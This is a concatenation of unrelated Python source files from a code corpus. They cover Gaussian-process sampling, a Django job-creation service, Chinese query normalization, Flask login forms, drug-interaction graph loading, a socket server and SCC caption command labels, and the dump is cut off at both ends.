def __init__(self, inputs, ll_type='rare', load_pts=False, **ll_kwargs):
self.inputs = inputs
self.ll_type = ll_type
self.load_pts = load_pts
self.ll_kwargs = ll_kwargs
if load_pts:
smpl = np.loadtxt('map_samples.txt')
self.pts = smpl[:,0:-1] # mc points
self.fx = smpl[:,-1] # pdf of mc points
def compute_value_tf_cost(self, pos, fidelity, cost):
''' Compute the benefit per cost of adding a sample (pos, fidelity)
'''
x = np.append(pos, fidelity)
value, gradient = self.compute_value(x)
return value/cost, gradient/cost
def compute_value(self, x):
''' Compute the benefit of adding a sample x
For single fidelity, x = pos, while for multi-fidelity,
x = {pos, fidelity}.
'''
x = np.atleast_2d(x)
integral, integral_derivative = self.compute_integral(x)
cov, cov_deriv = self.model.post_cov(x)
value = (integral / cov).item()
gradient = 1/cov**2 * (cov*integral_derivative - integral*cov_deriv)
gradient = gradient.reshape(-1)
return -value, -gradient
def compute_integral(self, x):
''' \int cov^2(f_i(pos), f_h(x'))*w(x')dx', x = {pos, i=fidelity}
Eq.(15) in paper.
and
d \int cov^2(f_i(pos), f_h(x'))*w(x')dx' d pos,
x = {pos, i=fidelity} Eq.(49) in paper.
'''
# compute value
kernel = self.model.kernel_
integral = self.compute_mixed_kappa(x,x)
alpha = cho_solve((self.model.L_, True), kernel(self.X, x))
integral += alpha.T.dot(np.dot(self.kappaXX, alpha)
- 2*self.compute_mixed_kappa(self.X, x))
# compute derivative
term1 = 2*self.compute_mixed_dkappa_dx(x,x)
dalpha_dx = cho_solve((self.model.L_, True),
kernel.gradient_x(x, self.X))
term2 = 2 * alpha.T.dot(np.dot(self.kappaXX, dalpha_dx))
term3 = 2 * alpha.T.dot(self.compute_mixed_dkappa_dx(x,self.X))
term3 += 2 * self.compute_mixed_kappa(x, self.X).dot(dalpha_dx)
return integral, term1 + term2 - term3
def update_prior_search(self, model):
''' Update the model(gpr), data(X), compute the gmm of weights and
kappa(X,X).
'''
self.model = model
self.X = self.model.X_train_
# generate GMM approximation of the likelihood
self._prepare_likelihood(self.ll_type, **self.ll_kwargs)
# constant for all hypothetical point
self.kappaXX = self.compute_mixed_kappa(self.X, self.X)
def compute_mixed_kappa(self, X1, X2):
''' compute averaged kappa w.r.t gmm components.
Eq. (18) in paper. The 'G' function relies on kernel properties.
'''
kernel = self.model.kernel_
mixed_kappa = 0
for i in range(self.gmm.n_components): # the number of gmm component
mixed_kappa += self.gmm.weights_[i] * kernel.intKKNorm(X1, X2,
self.gmm.means_[i],
self.gmm.covariances_[i])
return mixed_kappa
def compute_mixed_dkappa_dx(self, x, X):
''' Compute the averaged kappa derivatives.
Eq.(53) in paper.
'''
kernel = self.model.kernel_
mixed_kappa = 0
for i in range(self.gmm.n_components):
mixed_kappa += self.gmm.weights_[i] * kernel.dintKKNorm_dx(x, X,
self.gmm.means_[i],
self.gmm.covariances_[i])
return mixed_kappa
def _prepare_likelihood(self, ll_type, n_components=2, power=6,
center=0, depressed_side=None):
'''Compute gmm components of w(x').
'''
if self.load_pts:
pts = self.pts
fx = self.fx
n_samples = pts.shape[0]
else:
if self.inputs.dim <= 2:
n_samples = int(1e5)
else:
n_samples = int(1e6)
pts = self.inputs.sampling(n_samples) # input-samples
fx = self.inputs.pdf(pts) # weights
if ll_type =='input':
w_raw = fx
elif ll_type == 'plain':
w_raw = 1
else:
# compute the mean prediction for input-samples
if self.X.shape[1] != self.inputs.dim:
aug_pts = np.concatenate((pts, [[1]] * n_samples), axis = 1)
else:
aug_pts = pts
if ll_type == 'rare':
if n_samples > 4*1e5:
aug_pts_list = np.array_split(aug_pts, 10)
mu = np.empty(0)
for iii in range(10):
mu = np.concatenate((mu,
self.model.predict(aug_pts_list[iii]).flatten()))
else:
mu = self.model.predict(aug_pts).flatten()
x, y = custom_KDE(mu, weights=fx).evaluate()
self.fy_interp = InterpolatedUnivariateSpline(x, y, k=1)
w_raw = fx/self.fy_interp(mu)
elif ll_type == 'extreme':
mu = self.model.predict(aug_pts).flatten()
if center == 'mean':
center = np.average(mu, fx)
if depressed_side == 'negative':
w_raw = fx*abs(mu - center) ** (power*np.sign(mu - center))
elif depressed_side == 'positive':
w_raw = fx*abs(mu - center) ** (-power*np.sign(mu - center))
else:
w_raw = fx*abs(mu - center)**power
elif ll_type == 'failure':
# P(X)(1-P(X)) * p(X) / var(X)
mu, std = self.model.predict(aug_pts, return_std=True)
# failure probability as a Bernoulli RV
p = norm.cdf(mu.flatten()/std.flatten())
vb = p*(1-p) # var of the Bernoulli
vf = std**2 # var of the predictions
w_raw = vb * fx / vf
self.gmm = self._fit_gmm(pts, w_raw, n_components)
return self
@staticmethod
def _fit_gmm(pts, w_raw, n_components):
'''Fit gmm with weighted samples
'''
sca = np.sum(w_raw)
rng = np.random.default_rng()
aa = rng.choice(pts, size=50000, p=w_raw/sca)
gmm = GMM(n_components=n_components, covariance_type="full")
gmm = gmm.fit(X=aa)
return gmm
| 2.21875
| 2
|
django_business_logic/django_business_logic/apps/posts/internal_services/usecases.py
|
gonzaloamadio/django_business_logic
| 2
|
12783893
|
# -*- coding: utf-8 -*-
"""Concentrate the heavy business logic of the operations of an application.
It knows all Models that should be part of the flow and knows
the API/services of those models. It also orchestrate all the side-effects
and therefore can make the use of other use cases/services.
"""
from django.utils.translation import gettext as _
from payments_comissions.models import PaymentComission
from posts.models import Job
from posts_areas.models import PostArea
from tektank.internal_services.use_case_interface import UseCaseInterface
from tektank.libs_project.helpers import slug_generator
from .errors import InvalidCategories, InvalidDateOrder
from .interfaces import JobRepositoryInterface
class CreateJob(UseCaseInterface):
"""Create Job service.
Service layer for the creation of a Job. Here we are going to do all
validations and side effects. We are going to always use this service
instead of calling the Models create method directly.
We combine validations here, and validators in the model itself.
Input:
Parameters of Job model, i.e. its fields.
repository : A class that will operate against the DB,
or any other source to get/put information.
Raises:
InvalidCategories
InvalidDateOrder
Returns:
Instance of Job created.
"""
def __init__(
self,
repository: JobRepositoryInterface,
title,
email,
date_start,
date_end,
amount_to_pay,
avatar=None,
company=None,
city=None,
state=None,
country=None,
postal_code=None,
post_category=None,
post_subcategory=None,
address=None,
phone=None,
cellphone=None,
description=None,
terms=None,
deleted=False,
slug=None,
):
"""
We can instantiate like
CreateJob('title','<EMAIL>',date1,date2,
** { "address" : " 123 street ","description ":"This is a descr"}
So we are providing mandatory fields, and rest that we want to set.
Fields: slug and payment_comission does not appear, because they are
set by us. It is not an user input.
"""
# -- Set the internal state of the model for the operation
# The fields listed here, should match with the ones defined in the
# model definition. And also with only one _ before the field name.
self._title = title
self._email = email
self._date_start = date_start
self._date_end = date_end
self._amount_to_pay = amount_to_pay
self._avatar = avatar
self._company = company
self._city = city
self._state = state
self._country = country
self._postal_code = postal_code
self._post_category = post_category
self._post_subcategory = post_subcategory
self._address = address
self._phone = phone
self._cellphone = cellphone
self._description = description
self._terms = terms
# Forces None, as we set them
self._slug = None
self._payment_comission = None
self._deleted = deleted
# ----- Other objects ----- #
self.__obj = None
self.__repository = repository
# A list of keys defined in the model. If model is modified, we should
# also modify this.
self.__model_keys = [
'title',
'email',
'date_start',
'date_end',
'amount_to_pay',
'avatar',
'company',
'city',
'state',
'country',
'postal_code',
'post_category',
'post_subcategory',
'address',
'phone',
'cellphone',
'description',
'terms',
'slug',
'deleted',
'payment_comission',
]
@property
def repository(self) -> JobRepositoryInterface:
"""Return the respository (adapter) used."""
return self.__repository
def execute(self) -> Job:
"""Main operation, the one that be executed by external code. This
operation will condense the rest. Will execute side effects, and
all required operations in order.
"""
self._strip_data()
# Create an instance of Job, and save it into self.__obj
self._factory()
self.is_valid()
self.__obj.slug = self._generate_slug( # noqa: T484
self.__obj.id, self.__obj.title, # noqa: T484
)
self.__obj.payment_comission = self._generate_payment_comission( # noqa: T484
self.__obj.amount_to_pay, # noqa: T484
)
self.__repository.save(self.__obj)
return self.__obj
def _strip_data(self):
"""Clean fields. For example, delete trailing spaces."""
fields = [
"title",
"address_1",
"address_2",
"email",
"website",
"phone",
"cellphone",
]
for field in fields:
value = getattr(self, field, None)
if value:
setattr(self, field, value.strip())
def is_valid(self):
"""Public method to allow clients of this object to validate the data even before to execute the use case.
To use it, create an instance of the class with the values desired.
And execute it.
Returns:
True or False
Raises:
ValidationError, InvalidDateOrder, InvalidCategories
"""
# ## Check date order
if self._date_end and self._date_start and self._date_end <= self._date_start:
raise InvalidDateOrder(_("Start date should be before end date"))
# ## Check categories match.
# TODO: This should not be necessary, but in admin
# dropdown menu for selecting categories are not well filtered when selecting parent
# categorie, so we need to do it.
# TODO: Send ID instead of name for better lookup
# TODO: This logic would go inside posts_category services
if self._post_category:
assert isinstance(
self._post_category, str
), "Category name should be a string"
if self._post_subcategory:
assert isinstance(
self._post_subcategory, str
), "Subcategory name should be a string"
# If user selected both categories, check that the parent is the correct
# If only subcategory selected, fill the right parent.
# If only category, do nothing.
cat = (
PostArea.objects.find_by_name(self._post_category)
if self._post_category
else None
)
subcat = (
PostArea.objects.find_by_name(self._post_subcategory)
if self._post_subcategory
else None
)
if subcat:
if cat and subcat.parent != cat:
raise InvalidCategories(cat.name, subcat.name)
else:
self._post_category = subcat.parent.name
# Here at the end, as before this, we were cleaning and validating all
# fields, so it has sense that at this point, the model will be in the
# final state.
# If object is not stored locally, do it.
if not self.__obj:
self._factory()
# ## Execute programatically model validations. Raises validation error.
self.__obj.full_clean()
return True
def _generate_slug(self, uuid, title):
"""Generate slug for the instance."""
return slug_generator(uuid, title)
def _generate_payment_comission(self, amount_to_pay):
"""Assign an instance to PaymentComission related to this model.
This assignment will later dictated how we are going to charge this
job.
The rules of how we are going to calculate this, are done by us.
"""
return PaymentComission.assign_payment_comission(amount_to_pay)
def _factory(self):
"""Create an instance of a Job, and save it into self.__obj."""
# Check if it is a field in the model # TODO do it better?
# Remove _ from keys, so we pass correct arguments to create,
# and leave only values that are not None.
def process(s):
if s[0] == '_' and s[1] != '_' and s[1:] in self.__model_keys:
return s[1:]
params = {
process(k): v
for k, v in self.__dict__.items()
if v is not None and process(k)
}
self.__obj = self.__repository.factory(**params)
| 2.625
| 3
|
data/normalize/normalize.py
|
18645956947/TripleIE
| 0
|
12783894
|
<gh_stars>0
import re
with open('question.txt', 'r', encoding='utf-8') as f:
questions = f.readlines()
def select_question(question):
global normalize_list
# 是否为并列问题, 拆分成多个问题, '和'关键字
m_and_1 = re.search(r'(.*)(和)+(.*)', question)
if m_and_1:
question_list = deal_and_question(question)
return question_list
return []
# 是否为并列问题, 拆分成多个问题, '和'关键字
def deal_and_question(question):
prefix = ''
question_list = []
rule_1 = r'(总)*(农村人口|城镇人口|男性人口|女性人口|男女比例|人口|销售额|销量|营业额|利润|订单量|订单id|合同id|合同金额)+'
rule_2 = r'(总)+(农村人口|城镇人口|男性人口|女性人口|男女比例|人口|销售额|销量|营业额|利润|订单量|订单id|合同id|合同金额)+'
q_list = question.split('和')
for i, q in enumerate(q_list):
m_i = re.search(rule_1, q)
if i == 0:
if m_i:
# 获取公共前缀
prefix = q[:len(q) - len(m_i.group())]
question_0 = prefix + m_i.group()
# 将总人口替换成人口
m = re.search(rule_2, question_0)
if m:
before = question_0[:len(question_0) - len(m.group())]
after = m.group().replace('总', '')
question_list.append(before + after)
else:
question_list.append(prefix + m_i.group())
else:
if m_i:
question_n = prefix + m_i.group()
# 将总人口替换成人口
m = re.search(rule_2, question_n)
if m:
before = question_n[:len(question_n) - len(m.group())]
after = m.group().replace('总', '')
question_list.append(before + after)
else:
question_list.append(prefix + m_i.group())
return question_list
def replace_words(question):
# 人口
question = question.replace('农村的人口', '农村人口')
question = question.replace('城镇的人口', '城镇人口')
question = question.replace('男性的人口', '男性人口')
question = question.replace('女性的人口', '女性人口')
question = question.replace('多少人', '人口')
question = question.replace('人口数', '人口')
question = question.replace('人口数量', '人口')
question = question.replace('人口总数', '人口')
question = question.replace('人数', '人口')
question = question.replace('人的数量', '人口')
question = question.replace('人的总数', '人口')
question = question.replace('人口的数量', '人口')
question = question.replace('销售数量', '销量')
question = question.replace('销售的数量', '销量')
question = question.replace('销售数', '销量')
question = question.replace('订单数量', '订单量')
question = question.replace('订单的数量', '订单量')
question = question.replace('负面舆情数量', '负面舆情数')
question = question.replace('负面舆情的数量', '负面舆情数')
question = question.replace('评论数量', '评论数')
question = question.replace('评论的数量', '评论数')
question = question.replace('点赞数量', '点赞量')
question = question.replace('点赞的数量', '点赞量')
question = question.replace('阅读数量', '阅读量')
question = question.replace('阅读的数量', '阅读量')
question = question.replace('转发数数量', '转发数')
question = question.replace('转发的数量', '转发数')
question = question.replace('有多少', '')
question = question.replace('有哪些', '')
question = question.replace('哪些', '')
question = question.replace('那些', '')
question = question.replace('哪个', '')
question = question.replace('那个', '')
question = question.replace('所有', '')
question = question.replace('打开', '')
question = question.replace('查找', '')
question = question.replace('查询', '')
question = question.replace('找出', '')
question = question.replace('查查', '')
question = question.replace('查看', '')
question = question.replace('看看', '')
question = question.replace('筛选', '')
question = question.replace('选择', '')
question = question.replace('选出', '')
question = question.replace('筛选出', '')
question = question.replace('的', '有')
return question
normalize_list = []
for question in questions:
question_format = question.strip()
question_format = replace_words(question_format)
q_list = select_question(question_format)
if len(q_list):
for q in q_list:
normalize_list.append(q)
else:
normalize_list.append(question_format)
with open('normalize.txt', 'a+', encoding='utf-8') as f:
for line in normalize_list:
line = line.replace('总', '')
f.write(line + '\n')
| 2.890625
| 3
|
cocojson/run/viz.py
|
TeyrCrimson/cocojson
| 0
|
12783895
|
<reponame>TeyrCrimson/cocojson
import argparse
from cocojson.tools import viz
def main():
ap = argparse.ArgumentParser()
ap.add_argument('json', help='Path to coco json')
ap.add_argument('imgroot', help='Path to img root')
ap.add_argument('--outdir', help='Path to output dir, leave out to not write out', type=str, nargs='?', const=True)
ap.add_argument('--sample', help='Num of imgs to sample, leave this flag out to process all.', type=int)
ap.add_argument('--show', help='To imshow', action='store_true')
args = ap.parse_args()
viz(args.json, args.imgroot, outdir=args.outdir, sample_k=args.sample, show=args.show)
if __name__ == '__main__':
main()
| 2.546875
| 3
|
app/auth/forms.py
|
chenke91/ihaveablog
| 0
|
12783896
|
#coding=utf-8
from flask.ext.wtf import Form
from wtforms import StringField, SubmitField, PasswordField
from wtforms.validators import Required, Email, Length, EqualTo
from app.models import User
class RegisterForm(Form):
username = StringField('用户名', validators=[Required('请输入用户名')])
email = StringField('邮箱',
validators=[Required('请输入邮箱地址'), Email('邮箱格式不正确')])
password = PasswordField('密码',
validators=[Required('请输入密码'), Length(6, 20, '密码长度为6~20'),
EqualTo('password2', '两次输入不一致')])
password2 = PasswordField('重复密码',
validators=[Required('请重复密码'), Length(6, 20, '密码长度为6~20')])
submit = SubmitField('注册')
def validate_username(self, field):
if User.query.filter_by(username=field.data).count():
raise ValueError('用户名已存在')
def validate_email(self, field):
if User.query.filter_by(email=field.data).count():
raise ValueError('邮箱已注册')
class LoginFrom(Form):
email = StringField('邮箱',
validators=[Required('请输入邮箱地址'), Email('邮箱格式不正确')])
password = PasswordField('密码',
validators=[Required('请输入密码'), Length(6, 20, '密码长度为6~20')])
submit = SubmitField('登陆')
| 2.875
| 3
|
solutions/official/utils.py
|
kurazu/pycon_quiz
| 0
|
12783897
|
from functools import wraps
def cached(func):
cache = {}
@wraps(func)
def cached_wrapper(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return cached_wrapper
| 2.921875
| 3
|
utils/data/load_raw_data.py
|
codeKgu/BiLevel-Graph-Neural-Network
| 20
|
12783898
|
<reponame>codeKgu/BiLevel-Graph-Neural-Network
from collections import defaultdict
from glob import glob
from os.path import join, basename
import networkx as nx
import numpy as np
from scipy.sparse import csr_matrix
from tqdm import tqdm
from utils.data.dataset import BiGNNDataset
from utils.data.graph import Graph, GraphPair
from utils.util import get_data_path, load, sorted_nicely
def load_raw_interaction_data(name, natts, eatts, tvt):
if 'drugbank' in name:
dir_name = 'DrugBank'
drugbank_dir = join(get_data_path(), dir_name)
interaction_dir = join(drugbank_dir, 'ddi_data')
graph_data = load(join(drugbank_dir, 'klepto', 'graph_data.klepto'))
fname_to_gid_func = lambda fname: int(fname[2:])
interaction_fname = 'ddi_snap.tsv'
parse_edge_func = parse_edges_biosnap
data_dir = join(interaction_dir, 'drugs_snap')
if 'small' in name:
data_dir = join(interaction_dir, 'drugs_small')
interaction_file_path = join(interaction_dir, interaction_fname)
edge_types_edge_list, nodes = get_interaction_edgelist(
interaction_file_path,
parse_edge_func,
False,
fname_to_gid_func)
elif 'drugcombo' in name:
dir_name = 'DrugCombo'
drugcombo_dir = join(get_data_path(), dir_name)
graph_data = load(join(drugcombo_dir, "klepto", 'graph_data.klepto'))
data_dir = drugcombo_dir
interaction_dir = join(drugcombo_dir, 'ddi_data')
interaction_file_path = join(interaction_dir, 'Syner&Antag_voting.csv')
drugname_to_cid = load(join(drugcombo_dir, 'klepto', 'drug_name_to_cid'))
edge_to_gid_func = lambda x: int(drugname_to_cid[x.lower()][4:])
fname_to_gid_func = lambda x: int(x[4:])
num_pairs_synergy_antagonism = count_pairs_synergy_antagonism(
interaction_file_path)
edge_types_edge_list, nodes = get_interaction_edgelist(
interaction_file_path,
parse_edges_drugcombo,
True,
edge_to_gid_func,
skip_first_line=True,
num_pairs_synergy_antagonism=num_pairs_synergy_antagonism)
else:
raise NotImplementedError
graphs = iterate_get_graphs(data_dir, graph_data, nodes,
fname_to_gid_func, natts=natts)
pairs, graph_ids, edge_types_edge_list_filtered = get_graph_pairs(
edge_types_edge_list, graphs)
hyper_edge_labels = {'interaction': 1, 'no_interaction': 0}
sparse_node_feat, gid_to_idx = get_molecular_node_feats(graph_data,
graph_ids,
fname_to_gid_func)
if 'drugcombo' in name:
for pair in pairs.values():
if next(iter(pair.edge_types)) == 'antagonism':
pair.true_label = 2
hyper_edge_labels = {'antagonism': 2, 'synergy': 1, 'no_interaction': 0}
graphs = [graphs[gid] for gid in sorted(graph_ids)]
return BiGNNDataset(name, graphs, natts, hyper_edge_labels, eatts,
pairs, tvt, sparse_node_feat)
def get_molecular_node_feats(graph_data, gids, fname_to_gid_func):
gid_to_idx = {gid: i for i, gid in enumerate(sorted(list(gids)))}
gid_graph_data = {fname_to_gid_func(id): g_data for id, g_data in graph_data.items()}
mats = {}
for feat_shape in list(gid_graph_data.values())[0]['drug_feat']:
mat = np.zeros((len(gids), int(feat_shape)))
for gid in gids:
mat[gid_to_idx[gid]] = gid_graph_data[gid]["drug_feat"][feat_shape]
mats[feat_shape] = csr_matrix(mat)
return mats, gid_to_idx
def get_interaction_edgelist(file_path, parse_edges_func, has_interaction_eatts,
edge_to_gid_func, skip_first_line=False, **kwargs):
# assume each line in file is an edge, parse it using parse_edge_func
edge_types_edge_list = defaultdict(lambda: defaultdict(list))
nodes = set()
skipped = set()
with open(file_path, 'r') as f:
readlines = f.readlines() if not skip_first_line else list(f.readlines())[1:]
for i, line in enumerate(readlines):
edge, edge_type = parse_edges_func(line, **kwargs)
if edge:
try:
e1 = edge_to_gid_func(edge[0])
e2 = edge_to_gid_func(edge[1])
except KeyError as e:
skipped.add(str(e))
continue
if has_interaction_eatts and edge_type:
edge_types_edge_list[edge_type][e1].append(e2)
else:
edge_types_edge_list['default'][e1].append(e2)
nodes.add(e1)
nodes.add(e2)
print("number skipped: ", len(skipped))
return edge_types_edge_list, nodes
def parse_edges_biosnap(line):
return line.rstrip('\n').split('\t'), None
def count_pairs_synergy_antagonism(file_path):
count_syn_ant = defaultdict(lambda: defaultdict(int))
with open(file_path, 'r') as f:
for i, line in enumerate(list(f.readlines())[1:]):
line = line.split(',')
count_syn_ant[tuple(sorted([line[1], line[2]]))][line[-1]] += 1
return count_syn_ant
def parse_edges_drugcombo(line, **kwargs):
label_counts = kwargs['num_pairs_synergy_antagonism']
line = line.split(',')
drugs = [line[1], line[2]]
if label_counts[tuple(sorted(drugs))]['synergy\n']\
>= label_counts[tuple(drugs)]['antagonism\n']:
label = 'synergy'
else:
label = 'antagonism'
return drugs, label
def get_graph_pairs(edge_types_edge_list, graphs):
graph_pairs = {}
no_graph_structures = set()
final_graphs = set()
edge_types_edge_list_filtered = defaultdict(lambda: defaultdict(set))
for edge_type, edge_list in tqdm(edge_types_edge_list.items()):
for gid1, gid2s in edge_list.items():
if gid1 not in graphs.keys():
no_graph_structures.add(gid1)
continue
graph1 = graphs[gid1]
for gid2 in gid2s:
gid_pair = tuple(sorted([gid1, gid2]))
if gid_pair not in graph_pairs.keys():
if gid2 not in graphs.keys():
no_graph_structures.add(gid2)
continue
graph2 = graphs[gid2]
final_graphs.add(gid1)
final_graphs.add(gid2)
graph_pairs[gid_pair] = GraphPair(true_label=1,
g1=graph1, g2=graph2,
edge_types=set([edge_type]))
else:
graph_pairs[gid_pair].edge_types.add(edge_type)
edge_types_edge_list_filtered[edge_type][gid1].add(gid2)
return graph_pairs, final_graphs, edge_types_edge_list_filtered
def iterate_get_graphs(dir, graph_data, nodes, fname_to_gid_func,
check_connected=False, natts=(), eatts=()):
graphs = {}
not_connected = []
no_edges = []
graphs_not_in_edge_list = []
for file in tqdm(sorted_nicely(glob(join(dir, '*.gexf')))):
fname = basename(file).split('.')[0]
gid = fname_to_gid_func(fname)
if gid not in nodes:
graphs_not_in_edge_list.append(fname)
continue
g = nx.read_gexf(file)
g.graph['gid'] = gid
if not nx.is_connected(g):
msg = '{} not connected'.format(gid)
if check_connected:
raise ValueError(msg)
else:
not_connected.append(fname)
# assumes default node mapping to convert_node_labels_to_integers
nlist = sorted(g.nodes())
g.graph['node_label_mapping'] = dict(zip(nlist,
range(0, g.number_of_nodes())))
add_graph_data_to_nxgraph(g, graph_data[fname])
g = nx.convert_node_labels_to_integers(g, ordering="sorted")
if len(g.edges) == 0:
no_edges.append(fname)
continue
# # Must use sorted_nicely because otherwise may result in:
# # ['0', '1', '10', '2', '3', '4', '5', '6', '7', '8', '9'].
# # Be very cautious on sorting a list of strings
# # which are supposed to be integers.
for i, (n, ndata) in enumerate(sorted(g.nodes(data=True))):
BiGNNDataset.assert_valid_nid(n, g)
assert i == n
remove_entries_from_dict(ndata, natts)
for i, (n1, n2, edata) in enumerate(sorted(g.edges(data=True))):
BiGNNDataset.assert_valid_nid(n1, g)
BiGNNDataset.assert_valid_nid(n2, g)
remove_entries_from_dict(edata, eatts)
graphs[gid] = Graph(g)
print("total graphs with edges: {}\nnon connected graphs: {}"
.format(len(graphs), len(not_connected)))
print("not connected ids: ", not_connected)
print("num no edges: ", len(no_edges), "\nno edges ids: ", no_edges)
if not graphs:
raise ValueError('Loaded 0 graphs from {}\n'
'Please download the gexf-formated dataset'
' from Google Drive and extract under:\n{}'.
format(dir, get_data_path()))
return graphs
def remove_entries_from_dict(d, keeps):
for k in set(d) - set(keeps):
del d[k]
def add_graph_data_to_nxgraph(g, graph_data):
if graph_data:
for k,v in graph_data.items():
g.graph[k] = v
| 2.25
| 2
|
very_scratch/server/example5/websocketserver.py
|
ibrahemesam/Fos
| 3
|
12783899
|
#!/usr/bin/env python
import socket
import threading
import config
import websocketclient
class WebSocketServer:
"""
Handle the Server, bind and accept new connections, open and close
clients connections.
"""
def __init__(self):
self.clients = []
def start(self):
"""
Start the server.
"""
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', config.socketport))
s.listen(1)
try:
while 1:
conn, addr = s.accept()
print('Connected by', addr)
newClient = websocketclient.WebSocketClient(conn, addr, self)
self.clients.append(newClient)
newClient.start()
except KeyboardInterrupt:
[client.close() for client in self.clients]
s.close()
def send_all(self, data):
"""
Send a message to all the currenly connected clients.
"""
[client.send(data) for client in self.clients]
def remove(self, client):
"""
Remove a client from the connected list.
"""
l = threading.Lock()
l.acquire()
self.clients.remove(client)
l.release()
| 3.03125
| 3
|
pycaption/scc/translator.py
|
vpaul-dev/pycaption-github-release-notes
| 183
|
12783900
|
from pycaption.scc.constants import CHARACTERS, SPECIAL_CHARS, EXTENDED_CHARS
ALL_CHARACTERS = {**CHARACTERS, **SPECIAL_CHARS, **EXTENDED_CHARS}
COMMAND_LABELS = {
"9420": "Resume Caption Loading",
"9429": "Resume Direct Captioning",
"9425": "Roll-Up Captions--2 Rows",
"9426": "Roll-Up Captions--3 Rows",
"94a7": "Roll-Up Captions--4 Rows",
"942a": "Text Restart",
"94ab": "Resume Text Display",
"942c": "Erase Displayed Memory",
"94ae": "Erase Non-displayed Memory",
"942f": "End Of Caption",
"9140": "row 01, column 00, with plain white text.",
"91c1": "row 01, column 00, with white underlined text.",
"91c2": "row 01, column 00, with plain green text.",
"9143": "row 01, column 00, with green underlined text.",
"91c4": "row 01, column 00, with plain blue text.",
"9145": "row 01, column 00, with blue underlined text.",
"9146": "row 01, column 00, with plain cyan text.",
"91c7": "row 01, column 00, with cyan underlined text.",
"91c8": "row 01, column 00, with plain red text.",
"9149": "row 01, column 00, with red underlined text.",
"914a": "row 01, column 00, with plain yellow text.",
"91cb": "row 01, column 00, with yellow underlined text.",
"914c": "row 01, column 00, with plain magenta text.",
"91cd": "row 01, column 00, with magenta underlined text.",
"91ce": "row 01, column 00, with white italicized text.",
"914f": "row 01, column 00, with white underlined italicized text.",
"91d0": "row 01, column 00, with plain white text.",
"9151": "row 01, column 00, with white underlined text.",
"9152": "row 01, column 04, with plain white text.",
"91d3": "row 01, column 04, with white underlined text.",
"9154": "row 01, column 08, with plain white text.",
"91d5": "row 01, column 08, with white underlined text.",
"91d6": "row 01, column 12, with plain white text.",
"9157": "row 01, column 12, with white underlined text.",
"9158": "row 01, column 16, with plain white text.",
"91d9": "row 01, column 16, with white underlined text.",
"91da": "row 01, column 20, with plain white text.",
"915b": "row 01, column 20, with white underlined text.",
"91dc": "row 01, column 24, with plain white text.",
"915d": "row 01, column 24, with white underlined text.",
"915e": "row 01, column 28, with plain white text.",
"91df": "row 01, column 28, with white underlined text.",
"91e0": "row 02, column 00, with plain white text.",
"9161": "row 02, column 00, with white underlined text.",
"9162": "row 02, column 00, with plain green text.",
"91e3": "row 02, column 00, with green underlined text.",
"9164": "row 02, column 00, with plain blue text.",
"91e5": "row 02, column 00, with blue underlined text.",
"91e6": "row 02, column 00, with plain cyan text.",
"9167": "row 02, column 00, with cyan underlined text.",
"9168": "row 02, column 00, with plain red text.",
"91e9": "row 02, column 00, with red underlined text.",
"91ea": "row 02, column 00, with plain yellow text.",
"916b": "row 02, column 00, with yellow underlined text.",
"91ec": "row 02, column 00, with plain magenta text.",
"916d": "row 02, column 00, with magenta underlined text.",
"916e": "row 02, column 00, with white italicized text.",
"91ef": "row 02, column 00, with white underlined italicized text.",
"9170": "row 02, column 00, with plain white text.",
"91f1": "row 02, column 00, with white underlined text.",
"91f2": "row 02, column 04, with plain white text.",
"9173": "row 02, column 04, with white underlined text.",
"91f4": "row 02, column 08, with plain white text.",
"9175": "row 02, column 08, with white underlined text.",
"9176": "row 02, column 12, with plain white text.",
"91f7": "row 02, column 12, with white underlined text.",
"91f8": "row 02, column 16, with plain white text.",
"9179": "row 02, column 16, with white underlined text.",
"917a": "row 02, column 20, with plain white text.",
"91fb": "row 02, column 20, with white underlined text.",
"91fc": "row 02, column 24, with plain white text.",
"91fd": "row 02, column 24, with white underlined text.",
"91fe": "row 02, column 28, with plain white text.",
"917f": "row 02, column 28, with white underlined text.",
"9240": "row 03, column 00, with plain white text.",
"92c1": "row 03, column 00, with white underlined text.",
"92c2": "row 03, column 00, with plain green text.",
"9243": "row 03, column 00, with green underlined text.",
"92c4": "row 03, column 00, with plain blue text.",
"9245": "row 03, column 00, with blue underlined text.",
"9246": "row 03, column 00, with plain cyan text.",
"92c7": "row 03, column 00, with cyan underlined text.",
"92c8": "row 03, column 00, with plain red text.",
"9249": "row 03, column 00, with red underlined text.",
"924a": "row 03, column 00, with plain yellow text.",
"92cb": "row 03, column 00, with yellow underlined text.",
"924c": "row 03, column 00, with plain magenta text.",
"92cd": "row 03, column 00, with magenta underlined text.",
"92ce": "row 03, column 00, with white italicized text.",
"924f": "row 03, column 00, with white underlined italicized text.",
"92d0": "row 03, column 00, with plain white text.",
"9251": "row 03, column 00, with white underlined text.",
"9252": "row 03, column 04, with plain white text.",
"92d3": "row 03, column 04, with white underlined text.",
"9254": "row 03, column 08, with plain white text.",
"92d5": "row 03, column 08, with white underlined text.",
"92d6": "row 03, column 12, with plain white text.",
"9257": "row 03, column 12, with white underlined text.",
"9258": "row 03, column 16, with plain white text.",
"92d9": "row 03, column 16, with white underlined text.",
"92da": "row 03, column 20, with plain white text.",
"925b": "row 03, column 20, with white underlined text.",
"92dc": "row 03, column 24, with plain white text.",
"925d": "row 03, column 24, with white underlined text.",
"925e": "row 03, column 28, with plain white text.",
"92df": "row 03, column 28, with white underlined text.",
"92e0": "row 04, column 00, with plain white text.",
"9261": "row 04, column 00, with white underlined text.",
"9262": "row 04, column 00, with plain green text.",
"92e3": "row 04, column 00, with green underlined text.",
"9264": "row 04, column 00, with plain blue text.",
"92e5": "row 04, column 00, with blue underlined text.",
"92e6": "row 04, column 00, with plain cyan text.",
"9267": "row 04, column 00, with cyan underlined text.",
"9268": "row 04, column 00, with plain red text.",
"92e9": "row 04, column 00, with red underlined text.",
"92ea": "row 04, column 00, with plain yellow text.",
"926b": "row 04, column 00, with yellow underlined text.",
"92ec": "row 04, column 00, with plain magenta text.",
"926d": "row 04, column 00, with magenta underlined text.",
"926e": "row 04, column 00, with white italicized text.",
"92ef": "row 04, column 00, with white underlined italicized text.",
"9270": "row 04, column 00, with plain white text.",
"92f1": "row 04, column 00, with white underlined text.",
"92f2": "row 04, column 04, with plain white text.",
"9273": "row 04, column 04, with white underlined text.",
"92f4": "row 04, column 08, with plain white text.",
"9275": "row 04, column 08, with white underlined text.",
"9276": "row 04, column 12, with plain white text.",
